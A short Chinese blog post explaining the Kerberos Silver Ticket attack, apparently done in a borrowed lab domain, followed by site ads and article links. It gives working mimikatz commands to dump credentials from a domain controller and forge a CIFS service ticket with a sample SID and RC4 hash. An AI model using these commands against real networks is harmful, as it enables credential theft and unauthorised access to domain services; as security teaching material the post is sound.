黄金票据是伪造 TGT,白银票据(Silver Ticket)是伪造 ST(Service Ticket),因为它不想黄金票据一样使用krgtgt账户的hash,而是使用计算机账户的hash进行加密的,所以只能获访问指定的权限。
前提条件:域名称、域SID、域服务账户的hash、伪造的用户名(任意用户或者不存在的用户)
环境原因这里没用自己部的,用的是klion师傅的域环境。
利用过程:
privilege::debug
sekurlsa::logonpasswords 进域控拿hash
获取sid
kerberos::golden /domain:0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /target:OWA2010SP3.0day.org /service:cifs /rc4:bec0097cc7cca53df5bfd48d85c48d68 /user:yangttt /ptt
联系邮箱:yang_s1r@163.com
博客园地址:https://www.cnblogs.com/Yang34/
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 深入理解 Mybatis 分库分表执行原理
· 如何打造一个高并发系统?
· .NET Core GC压缩(compact_phase)底层原理浅谈
· 现代计算机视觉入门之:什么是图片特征编码
· .NET 9 new features-C#13新的锁类型和语义
· Spring AI + Ollama 实现 deepseek-r1 的API服务和调用
· 《HelloGitHub》第 106 期
· 数据库服务器 SQL Server 版本升级公告
· 深入理解Mybatis分库分表执行原理
· 使用 Dify + LLM 构建精确任务处理应用